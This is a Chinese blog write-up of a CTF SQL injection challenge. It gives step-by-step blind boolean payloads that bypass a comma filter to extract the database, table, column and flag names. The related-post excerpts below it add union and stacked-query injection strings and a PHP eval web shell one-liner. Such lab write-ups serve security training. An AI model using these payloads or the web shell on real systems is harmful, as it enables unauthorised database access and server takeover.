“百度杯”CTF比赛 九月场 SQLi 解题思路

最新推荐文章于 2022-11-30 10:06:12 发布
原创 最新推荐文章于 2022-11-30 10:06:12 发布 · 1.2k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#CTF

本文详细介绍了如何通过SQL注入攻击获取数据库中的敏感信息。从发现漏洞到利用SQL注入爆破数据库名称、表名称、列名称及具体值的全过程,是一篇实战型的安全渗透测试教程。

题目简介

题目名称:SQLi
题目内容:后台有获取flag的线索

解题思路

  1. 打开地址使用burp抓包发现“l0gin.php?id=1”。

在这里插入图片描述

  1. 打开“l0gin.php?id=1”地址

使用1’ and ‘1’=‘1(成功)和1’ and ‘1’='2(不成功),说明此处存在sql注入。测试中发现后台过滤了逗号,在这里使用from for代替逗号。

开始注入

  • 猜测数据库名称
    猜测数据库名称的长度。代码:id=1' and (select length(database()))='4
    爆破数据库名称,按位猜测每一位的字符。代码:substring((select database()) from 1 for 1)='q
    这一步得出数据的名称“sqli”。

  • 猜测表名称
    猜测表名的长度。代码:(select length(group_concat(table_name)) from information_schema.tables where table_schema='sqli')='5
    爆破表名,按位猜测每一位的字符。代码:substring((select group_concat(table_name) from information_schema.tables where table_schema='sqli') from 1 for 1)='f
    这一步得出表的名称“users”。

  • 猜测列名称

    猜测列名测长度。代码:(select length(group_concat(column_name)) from information_schema.columns where table_name='users')='29
    爆破列名,按位猜测每一位的字符。代码:substring((select group_concat(column_name) from information_schema.columns where table_name='users') from 1 for 1)='f
    这一步得出列名“flag_9c861b688330”。

  • 猜测值

    猜测值得长度。代码:(select length(group_concat(flag_9c861b688330)) from users)='47
    爆破值,按位猜测每一位的字符。代码:substring((select group_concat(flag_9c861b688330) from users) from 1 for 1)='1
    这一步得出列中的值。

百度CTF比赛 九月SQLi(多种姿势)
u011250160的博客
04-04 519
上题 进入网站,发现提示 按照提示访问http://91ad046335104584a1cc3f4e3a83513688ef3757714748d4.changame.ichunqiu.com/login.php?id=1 没有什么有用的信息 使用burpsuite抓包看下 同样没有什么有用的信息 用dirsearch扫下敏感目录 访问robots.txt出现nothing here 访问config.php没有得到信息 访问login.php得到error 访问index.php跳转到开始的load
i春秋 “百度CTF比赛 九月 SQL
include_heqile的博客
09-12 1542
https://www.ichunqiu.com/battalion?t=1&r=0 看题目就知道这是一道注入题,这道题其实并没有什么难度,主要就是select、union、=等被过滤了,我们需要找到一种有效的绕过方法,这道题的绕过方法就是在敏感字符串中间加上<>,这个是通过提交各种特殊字符串并查看源代码得到的,当我们提交了<>之后,再去查看源代码,会发现源代码界...
百度CTF比赛 九月 SQLi
feng的博客
09-11 435
这题主要涉及SQL注入的相关知识,涉及的绕过是过滤了逗号后面的语句
百度CTF比赛 九月 题目名称:SQLi 后台有获取flag的线索
qq_41168609的博客
07-23 935
百度CTF比赛 九月 题目名称:SQLi 后台有获取flag的线索解题思路 解题思路 1. 具有SQL注入点连接: http://c3084761df8c4b1c91ddf64fd8c2ed4f22bb2637d78e4132.changame.ichunqiu.com/l0gin.php?id 2. 逗号之后被截断了,使用无逗号注入mysql无逗号的注入技巧 3. 判断字段个数 (SQL语句出错时,id原样输出) payload: l0gin.php?id=1%27%20order%20by%2
百度CTF比赛 九月SQLi ---------mozhe
weixin_40709439的博客
08-25 1573
题目链接:https://www.ichunqiu.com/battalion 点击进去,查看源代码  发现login.php?id=1 一般是存在sql注入的,可是我测试了好几遍,sqlmap也跑过了,也没发现啥 没办法,查看了官方wp,说是存在index.php,并在其header头有真正的注入点 在index.php请求进行301重定向,明显发现上面的链接只差一个字母,...
百度CTF比赛 九月 Upload解题思路
qq_43473164的博客
05-16 1914
Hello,大家好,我是锘锘鸡。 今天分享给大家的是百度CTF比赛的Upload解题思路。 先看下题目 提示flag就在flag.php中。 进入答题链接 发现是文件上传,于是好奇的锘锘鸡开始了他的第一波操作"题下留名",证明自己来过 上传成功后,锘锘鸡惊奇的发现,上传成功在html中是在a标签中的,而且直接链接到文件目录下。 锘锘鸡试着点开!!!click… 嗯??… 锘锘鸡电灯泡一...
工匠-CTF(题目+exp+解题思路
04-01
CTF竞赛模式具体分为以下三类: 一、解题模式(Jeopardy) 在解题模式CTF赛制中,参赛队伍可以通过互联网或者现网络参与,这种模式的CTF竞赛与ACM编程...资源包括工匠比赛的三道题目和exp,并详细写出了解题思路
百度CTF比赛 九月--web Upload
hanjinrui15的博客
12-30 806
百度CTF比赛 九月--web Upload基础知识1、什么是一句话木马?2、一句话木马的简要原理3、html渲染过程解析渲染该过程主要分为以下步骤:解决方案:4、PHP中substr()函数解题思路1、代码分析2、求解题目总结 基础知识 1、什么是一句话木马? 最简单的理解就是,一句话木马上传到网站后台,然后我们可以通过提交参数等的方式去获取shell,比如拿菜刀或者蚁剑等工具。比如下面这段php一句话木马: <?php @eval($_POST['key']) ?> 【基本原理
CTF-MISC-流量分析解题思路汇总(一)
最新发布
12-11
在进行CTF-MISC类别的流量分析题目时,解题思路大致可以分为以下几个步骤: 1. 数据包捕获与初步分析:使用Wireshark或其他抓包工具对流量进行捕获,然后进行初步的数据包分析。在这一阶段,选手需要检查数据包的...
百度CTF比赛 九月 SQLi
weixin_43858799的博客
05-19 834
1、打开题目 一篇空白 发现一直在loading 还以为是网卡没加载 刷新几遍之后 发现原来都是套路 2、根据提示flag在后台 用bp抓包进行测试 看到 login.php?id=1 通过URL进行访问 发现没有什么可以用的信息 再用bp抓包 也灭有可以用信息 最后实在没办法了 看了官方的WP 才知道存在index.php 文件 并在hearder中有提示 通过URL访问...
百度CTF比赛 九月 SQLI
wyj_1216 House
04-06 395
题目来源 i春秋题库 writeup 1、一开始进去,啥都没有,那就查看页面源代码看看吧 发现了login.php?id=1 2、于是,进入到此页面看看 尝试进行注入,发现,并不是真正的注入点。 3、那就一起来找一下注入点吧 这里有个很坑的地方!!! 存在跳转!!! 具体发现方法,我也是拜读了大佬的博客才发现的 注意看上面两张图片, 发现了隐藏起来的关键点:l0gin.php?id=1 ...
百度CTF比赛 九月 SQL
SPS98
11-02 395
先放下参考链接:大方子的WP 还有自己以前写的mysql注入 —— union 平台那边的题目是这样的 很明确说是SQL注入,然后打开容器 很明显是要对id进行注入, 先不着急注入, 把id值变换看看 表面看上去只有两条数据的样子 那就先试下常用操作, 在1后面加个' 没有反应, 应该是出错或者屏蔽报错, 再加个#看看 依旧没反应, 再去掉' 从而可以推测出查询语句应该是sele...
【SQL注入】CTF练习题WriteUp——“百度CTF比赛 九月SQL
Fighting_hawk的博客
05-17 4201
1. 本题关键在于关键字的绕过,需要耐心+细心,一个个尝试。 2. 同时在练习过程中多记录累积一些绕过的方法,比如这一道题的。
CTFSqli-Labs题目解析(1-11题)
a690135443的博客
06-14 1544
第一题 提示输入numeric类型的ID作为参数,尝试在url后添加?id=1查看,发现有显示。 改为?id=-1后无显示,也无报错,于是可以考虑-1空出位置后加union select爆数据。 改为?id=1'单引号报错,双引号不报错,可以推断出使用单引号闭合,加上注释之后,错误也消失了,所以可以在这个时候union select了。 然后添加order by语句,?id=1' order by 4 --+,当order by 4的时候报错,所以一共有3个字段。 然后使用unio
CTFHub技能书解题笔记-SQL注入-整数型注入
qq_43006864的博客
12-21 2840
一、到了SQL注入了,这里的话,我建议大家手动注入,要是不熟悉sqlmap的话,建议分别做一遍,这里我附上手动注入的方式。 打开题目 很清楚的告诉我们,整数型注入,还告诉我们输个1试试。 看红字部分。噢哟,直接sql语句都出来了, 这个语句很简单了,大家有sql基础的都看得懂, 然后清晰了。 常规做法,下一步恒真式,and 1=1,冲! 有回显,存在注入点了。他并没有加引号,这里也不需要加--+ # 之类的,直接进行注入就行了。 我习惯再url上进行操作,大家也可以再输入框操
青少年CTF平台---sqli-labs
t235336456的博客
11-30 695
看到有个flag表然后查看段名(id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='flag' --+)查数据(id=-1' union select 1,group_concat(0x7e,flag),3 from security.flag --+)题目:sqli-labs。到4的时候会返回错误信息。
网络知识扫盲
weixin_34416649的博客
05-29 202
SQL 注入 通过在用户可控参数中注入 SQL 语法,破坏原有 SQL 结构,达到编写程序时意料之外结果的攻击行为。其成因可以归结为以下两个原因叠加造成的: 1. 程序编写者在处理应用程序和数据库交互时,使用字符串拼接的方式构造 SQL 语句 2. 未对用户可控参数进行足够的过滤便将参数内容拼接进入到 SQL 语句中 XSS 跨站脚本攻击 跨站脚本攻击(Cross Site Script...
ctf supersqli
weixin_45945976的博客
10-28 396
堆叠注入 正常访问如下 在1后门加 ‘ 报错 可能存在注入: order by 测试猜测字段 发现有两个: union select 1,2查询回显,发现select、where等字符被过滤: 尝试堆叠注入 =1’ ;show databases;–+ 发现能够回显库名: 继续堆叠注入 =1’;show tables;–+ 堆叠注入爆出列名 =1’;show columns from words;–+ 没有敏感信息: 堆叠注入查询1919810931114514表中所有列 =1’;sho
百度CTF比赛 九月------code
大方子
08-16 3228
============================= 个人收获: 1.phpstorm创建的文件会自动穿件idea,里面的workspace.xml会保存目录结构 2.URL文件包含要多注意   =============================   题目:   刚开始以为是隐写,保存到本地打开看没有什么奇怪的地方,打开源码也很正常 但是URL的连接引起我...
工匠-CTF比赛全解析:题目、解答与思路
资源摘要信息: "工匠-CTF(题目+exp+解题思路)" CTF(Capture The Flag,夺旗赛)是一种信息安全领域的竞赛,比赛的目标通常是在一个模拟的环境中,通过发现和利用各种安全漏洞、进行密码学分析、逆向工程、Web...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值